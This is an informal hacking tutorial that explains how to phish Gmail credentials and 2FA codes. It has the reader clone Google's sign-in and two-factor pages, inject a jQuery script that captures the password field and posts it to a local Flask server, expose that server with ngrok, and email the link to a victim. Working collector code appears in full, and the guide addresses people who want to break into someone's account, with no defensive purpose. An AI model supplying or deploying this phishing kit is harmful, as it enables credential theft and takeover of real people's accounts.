How to Bypass Gmail 2FA; Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim.
REQUIREMENTS
1)KALI LINUX
2)SUBLIME TEXT EDITOR
3)NGROK
STEP 1:
Initially use your browser and search for google sign in.
STEP 2:
Type the mail id you wanna hack, after entering the mail id and click next.
STEP 3:
After entering the mail id and right click the mouse and click inspect.
STEP 4:
after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes.
STEP 5:
paste it on sublime text editor and add some script at the end of the html tag.
ill drop the code here:
<script src=”https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js”></script> <script> $(‘button’).click(function(e){ e.preventDefault() auth=$(‘input[type=password]’).val() $.post( “http://localhost:5000/auth”, {“password”:auth}, function(data, status){ window.location=”http://localhost:5000/login” } ); return false; }) </script> </html>
save this file as login.html
NOTE:
do it same for 2 factor authentication page
STEP 6:
next we need to write a python code that fetch deets from victim. And save it as app.py
ill give the code below
app.py
#!/usr/bin/env python3
from flask import Flask, render_template, send_file, make_response, request
app = Flask(__name__)
@app.route(“/auth”, methods=[“POST”])
def auth():
print(request.form.to_dict())
return “ok”
@app.route(“/”)
def index():
response = make_response(send_file(“templates/login.html”))
response.headers.add(“Access-Control-Allow-Origin”, “*”)
return response
@app.route(“/login”)
def login():
return send_file(“templates/2fa.html”)
if __name__ == “__main__”:
app.run()
STEP 7:
open terminal in linux and type as i did and configure the ngrok
ngrok command
STEP 8:
And send the link in mail to victim, BOOM…….!!!! youve got a password.